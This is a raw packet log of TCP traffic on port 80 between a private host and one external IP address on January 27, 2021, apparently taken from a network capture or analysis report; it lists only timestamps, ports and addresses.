Jan 27, 2021 19:09:20.072472095 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072480917 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072495937 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072514057 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072518110 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072535038 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072539091 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072556019 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072562933 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072581053 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072586060 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072598934 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072608948 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072628975 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072632074 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072654963 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072662115 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072675943 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072679043 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072695017 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072701931 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072724104 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072725058 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072746992 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072751045 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072758913 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072766066 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072788000 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072792053 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072804928 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072809935 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072833061 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072834969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072854996 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072856903 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072873116 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072877884 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072900057 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072900057 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072921038 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072921038 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072942972 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072942972 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072959900 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072967052 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.072976112 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.072989941 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073009014 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073013067 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073035002 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073036909 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073050022 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073059082 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073079109 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073080063 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073096037 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073103905 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073126078 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073144913 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073147058 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073148966 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073160887 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073167086 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073184967 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073189974 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073213100 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073215008 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073230028 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073234081 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073250055 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073256016 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073277950 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073277950 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073295116 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073298931 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073313951 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073319912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073342085 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073344946 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073360920 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073367119 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073379040 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073410034 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073410988 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073434114 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073453903 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073455095 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073472977 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073476076 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073487997 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073498964 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073519945 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073522091 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073542118 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073544979 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073560953 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073568106 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073577881 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073590040 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073610067 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073611021 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073627949 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073631048 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073645115 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073653936 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073676109 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073678017 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073697090 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073702097 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073710918 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073724985 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073748112 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073750973 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073765039 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073770046 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073781013 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073791027 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073796988 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073805094 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073823929 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073832989 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073841095 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073848963 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073862076 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073875904 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073884964 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073889971 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073901892 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073916912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073920012 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073932886 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073934078 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073950052 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073956013 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073965073 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073976040 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.073992014 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.073996067 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074006081 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074017048 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074028015 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074039936 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074048996 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074062109 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074071884 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074079037 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074094057 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074095011 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074114084 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074122906 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074129105 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074136019 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074150085 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074151039 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.074165106 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.074177027 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.077120066 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.320379972 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320405006 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320417881 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320430040 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320446014 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320461035 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320480108 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320497990 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.320688963 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.324561119 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.324673891 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325206995 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325227022 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325243950 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325259924 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325262070 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325278044 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325293064 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325294018 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325309992 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325323105 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325325966 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325341940 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325352907 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325361013 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325377941 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325407028 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325413942 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325422049 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325438023 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325438023 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325453997 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325457096 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325473070 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325484991 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325490952 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325505972 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325512886 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325521946 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325537920 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325541019 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325552940 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325566053 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325567961 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325583935 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325593948 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325603008 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325620890 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325623989 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325635910 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325651884 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325653076 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325669050 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325676918 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325684071 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325700045 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325710058 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325716972 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325736046 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325741053 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325752974 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325759888 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325767994 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325783968 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325788021 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325798988 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325814009 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325815916 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325829983 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325841904 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325845957 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325865984 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325874090 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325882912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325896978 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325898886 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325913906 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325925112 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325930119 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325947046 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325958967 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325963020 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.325970888 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325988054 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.325998068 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326003075 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326021910 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326025009 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326040030 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326054096 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326056004 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326071978 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326081991 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326090097 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326101065 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326112032 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326118946 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326134920 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326152086 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326163054 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326174021 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326183081 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326191902 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326201916 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326217890 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326231956 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326235056 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326251030 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326260090 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326267004 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326283932 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326294899 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326299906 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326319933 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326338053 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326353073 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326364040 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326375961 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326387882 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326399088 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326411009 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326422930 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326433897 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326445103 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326457024 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326467991 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326482058 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326486111 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326487064 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326500893 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326508999 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326517105 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326534033 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326549053 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326564074 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326567888 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326586008 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326594114 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326606035 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326622009 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326632023 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326638937 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326657057 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326672077 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326674938 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326697111 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326715946 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326728106 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326733112 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326750040 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326759100 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326770067 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326787949 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326802969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326812029 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326819897 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326834917 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326843977 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326852083 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326869011 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326877117 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326885939 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326905966 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326909065 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326924086 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326940060 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326956987 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326966047 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326977968 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.326980114 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.326989889 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327006102 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327020884 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327020884 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327038050 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327053070 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327058077 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327074051 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327091932 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327099085 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:20.327107906 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327125072 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:20.327136040 CET	80	49168	177.70.106.69	192.168.2.22
